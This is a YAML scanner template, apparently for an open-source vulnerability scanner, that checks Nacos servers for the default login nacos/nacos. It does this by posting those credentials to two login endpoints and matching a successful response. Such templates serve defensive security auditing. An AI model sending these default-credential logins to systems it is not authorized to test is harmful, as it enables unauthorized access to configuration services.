漏洞描述
Nacos 默认账号密码为nacos/nacos
id: nacos-default-password
info:
name: Nacos Default Password
author: zan8in
severity: high
verified: true
description: |-
Nacos 默认账号密码为nacos/nacos
tags: nacos,default-password
created: 2025/03/27
rules:
r0:
request:
method: POST
path: /v1/auth/users/login
body: username=nacos&password=nacos
expression: response.status == 200 && response.body.bcontains(b'"username":') && response.body.bcontains(b'"nacos"')
r1:
request:
method: POST
path: /nacos/v1/auth/users/login
body: username=nacos&password=nacos
expression: response.status == 200 && response.body.bcontains(b'"username":') && response.body.bcontains(b'"nacos"')
expression: r0() || r1()